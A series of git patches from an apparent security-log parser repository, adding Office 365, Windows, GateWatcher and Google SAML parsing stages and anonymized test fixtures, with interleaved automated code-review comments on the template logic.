"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + } }, "expected": { "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json index 7f11fadc3..3c91bcb5d 100644 --- a/Office 365/o365/tests/operation_properties_02.json +++ b/Office 365/o365/tests/operation_properties_02.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + } }, "expected": { "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", From 2c5909d2a02678580e98ccee0e606360c9ca9b9a Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 12 Nov 2024 17:01:51 +0100 Subject: [PATCH 026/150] Delete .vscode/settings.json Delete a unnecessary file --- .vscode/settings.json | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 .vscode/settings.json diff --git a/.vscode/settings.json b/.vscode/settings.json deleted file mode 100644 index b92839d53..000000000 --- a/.vscode/settings.json +++ /dev/null @@ -1,22 +0,0 @@ -{ - "workbench.colorCustomizations": { - "activityBar.activeBackground": "#65c89b", - "activityBar.background": "#65c89b", - "activityBar.foreground": "#15202b", - "activityBar.inactiveForeground": "#15202b99", - "activityBarBadge.background": "#945bc4", - "activityBarBadge.foreground": "#e7e7e7", - "commandCenter.border": "#15202b99", - "sash.hoverBorder": "#65c89b", - "statusBar.background": "#42b883", - "statusBar.foreground": "#15202b", - "statusBarItem.hoverBackground": "#359268", - "statusBarItem.remoteBackground": "#42b883", - "statusBarItem.remoteForeground": "#15202b", - "titleBar.activeBackground": "#42b883", - "titleBar.activeForeground": "#15202b", - "titleBar.inactiveBackground": "#42b88399", - "titleBar.inactiveForeground": "#15202b99" - }, - "peacock.color": "#42b883" -} \ No newline at end of file From 71bb0846a7cd6f72a28493543d4b1066215d3dcd Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 13 Nov 2024 10:52:05 +0100 Subject: [PATCH 027/150] Fixing tls and tls_* fields --- GateWatcher/aioniq/_meta/fields.yml | 13 +++++++++---- GateWatcher/aioniq/ingest/parser.yml | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 7fb7e28af..07bae26e7 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -384,14 +384,19 @@ gatewatcher.tlp:
   name: gatewatcher.tlp
   type: text
-gatewatcher.tls.sni:
+gatewatcher.tls:
+  description: This field contains all TLS data fields in a TLS metadata
+  name: gatewatcher.tls
+  type: text
+
+gatewatcher.tls_sni:
   description: This field represents the TLS SNI field in a TLS metadata
-  name: gatewatcher.tls.sni
+  name: gatewatcher.tls_sni
   type: text
-gatewatcher.tls.fingerprint:
+gatewatcher.tls_fingerprint:
   description: This field represents the TLS server fingerprint field in a TLS metadata
-  name: gatewatcher.tls.fingerprint
+  name: gatewatcher.tls_fingerprint
   type: text
 gatewatcher.ttp:
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index b71064e6d..3cc13d747 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -210,7 +210,8 @@ stages:
           tls.server.not_before: "{{json_load.message.tls.notbefore}}"
           tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
           tls.server.subject: "{{json_load.message.tls.subject}}"
-          gatewatcher.tls.sni: "{{json_load.message.tls.sni}}"
-          gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}"
+          gatewatcher.tls: "{{json_load.message.tls}}"
+          gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+          gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
           tls.version: "{{json_load.message.tls.version}}"
           tls.server.not_after: "{{json_load.message.tls.notafter}}"
From ec5851efc208a5fa84e247079c402e3bb4b2472d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Wed, 13 Nov 2024 15:45:33 +0100
Subject: [PATCH 028/150] refactor(Windows): merge source_ip and source_address into one stage
---
 Windows/windows/ingest/parser.yml | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 988ae3dbc..f0bd6640b 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
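Review bot: `gatewatcher.tls: "{{json_load.message.tls}}"` copies a whole object into a field that the fields.yml hunk above declares as `type: text`; rendered through a Jinja template this most likely yields the object's Python string form rather than JSON, which is awkward to search on and duplicates what `gatewatcher.tls_sni` and `gatewatcher.tls_fingerprint` already carry. If a serialized copy of the TLS metadata is really wanted, `gatewatcher.tls: "{{ json_load.message.tls | tojson }}"` gives a stable, parseable form, assuming the engine exposes Jinja's standard `tojson` filter. Renaming `gatewatcher.tls.sni` / `gatewatcher.tls.fingerprint` to the underscore names is also a breaking change for any detection rule or saved query written against the old names, which the commit message should call out.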
@@ -153,8 +153,7 @@ pipeline:
   - name: set_file
   - name: set_user
   - name: process_ids
-  - name: source_ip
-  - name: source_address
+  - name: set_source_fields
   - name: action_outcome
   - name: set_dll
     filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}"
@@ -1106,7 +1105,7 @@ stages:
           action.outcome: "failure"
         filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}"
-  source_ip:
+  set_source_fields:
     actions:
       - set:
           source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}"
@@ -1131,8 +1130,6 @@ stages:
       - set:
           source.ip: "{{source_ip_ip_address.event.ip}}"
-  source_address:
-    actions:
       - set:
           source.address: "{{json.event.SourceIp}}"
         filter: "{{json.event.SourceIp | is_ipaddress}}"
From 042e95418f89dd14ed87a57760af748a55ddbd75 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Wed, 13 Nov 2024 15:56:25 +0100
Subject: [PATCH 029/150] Add saml seervice to the parser
---
 Google Cloud/google-report/_meta/fields.yml | 15 +++
 .../_meta/smart-descriptions.json | 114 ++++++++++++++++++
 Google Cloud/google-report/ingest/parser.yml | 20 +++
 .../tests/test_saml_login_success.json | 63 ++++++++++
 .../tests/test_saml_login_success_1.json | 63 ++++++++++
 5 files changed, 275 insertions(+)
 create mode 100644 Google Cloud/google-report/tests/test_saml_login_success.json
 create mode 100644 Google Cloud/google-report/tests/test_saml_login_success_1.json
diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..ad86f9169 100644
--- a/Google Cloud/google-report/_meta/fields.yml
+++ b/Google Cloud/google-report/_meta/fields.yml
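Review bot: In the merged `set_source_fields` stage the last action still derives `source.address` from `json.event.SourceIp` alone, while the stage's first action accepts `json.event.SourceIp or json.event.SourceAddress` for `source.ip`, so an event that carries only `SourceAddress` ends up with a `source.ip` but no matching `source.address` unless one of the actions between the second and third hunk covers that case. Aligning the two would be `source.address: "{{json.event.SourceIp or json.event.SourceAddress}}"` with `filter: "{{ (json.event.SourceIp or json.event.SourceAddress) | is_ipaddress }}"`. The stage's remaining actions lie between the hunks and are not visible here.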
@@ -42,3 +42,18 @@ google.report.token.type:
   description: Token type
   name: google.report.token.type
   type: keyword
+
+google.report.saml.status_code:
+  description: SAML response status
+  name: google.report.saml.status_code
+  type: keyword
+
+google.report.saml.initiator:
+  description: SAML requester of saml authentication
+  name: google.report.saml.initiator
+  type: keyword
+
+google.report.saml.application_name:
+  description: Saml SP application name
+  name: google.report.saml.application_name
+  type: keyword
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..6fa8c709a 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -168,6 +168,120 @@ } ] }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + 
}, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e00c5ee79 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
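Review bot: The last entry added in this hunk, `User {user.email} failed to log in using {network.application} service : {event.reason}`, is a byte-for-byte duplicate of the fourth one, and it sits after the less specific `failed to log in using {network.application} service` entry, so if descriptions are matched first-wins (which the most-specific-first ordering of the file suggests) it can never be selected; drop it. Both `{event.reason}` failure entries condition on `google.report.saml.application_name`, which they do not render, and not on `event.reason`, which they do, so a failure event without a `failure_type` parameter renders a dangling `service : `; the condition should be `{ "field": "event.reason" }` instead. Likewise the third entry (`… successfully logged in by {network.application} service`) carries exactly the conditions of the second, including `google.report.saml.application_name`, so it is unreachable as written; removing that condition turns it into the intended fallback.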
@@ -258,3 +260,21 @@ stages:
         {%- endif -%}
         {% endfor %}
         {{ types|unique|list }}
+
+  set_saml_fields:
+    actions:
+      - set:
+          event.category: ["authentication"]
+          device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}'
+
+      - set:
+          event.type: ["allowed"]
+        filter: '{{ json_event.message.events[0].name == "login_success"}}'
+
+      - set:
+          event.type: ["denied"]
+          event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
+        filter: '{{ json_event.message.events[0].name == "login_failure"}}'
diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json
new file mode 100644
index 000000000..a96c1fab6
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_saml_login_success.json
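Review bot: Each `{% for param in … %}{% if param.name == "…" %}{{param.value}}{% endif %}{% endfor %}` lookup in `set_saml_fields` has no early exit, so if a parameter name ever occurs twice in `events[0].parameters` the values are concatenated into one string (e.g. two `failure_type` entries would produce a fused `event.reason`); the same pattern is repeated five times, which also makes the stage hard to read. A filter chain picks exactly one value and reads as a lookup, assuming the engine exposes Jinja's standard `selectattr`/`map`/`first` filters and renders an undefined result as empty, which the `expected` blocks of the two new test files (no `device` key although `device.id` is always set) suggest it does for the current empty-loop case. Events beyond `events[0]` are ignored here as in the sibling stages, so this is not new behaviour.
```yaml
  set_saml_fields:
    actions:
      - set:
          event.category: ["authentication"]
          # one value per parameter name; `first` leaves the field empty when the parameter is absent
          device.id: '{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "device_id") | map(attribute="value") | first }}'
          google.report.saml.status_code: '{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "saml_status_code") | map(attribute="value") | first }}'
          google.report.saml.initiator: '{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "initiated_by") | map(attribute="value") | first }}'
          google.report.saml.application_name: '{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "application_name") | map(attribute="value") | first }}'
      # … unchanged: event.type "allowed" action for login_success …
      - set:
          event.type: ["denied"]
          event.reason: '{{ json_event.message.events[0].parameters | selectattr("name", "equalto", "failure_type") | map(attribute="value") | first }}'
        filter: '{{ json_event.message.events[0].name == "login_failure"}}'
```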
@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, 
+ "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..94e5f299f --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + 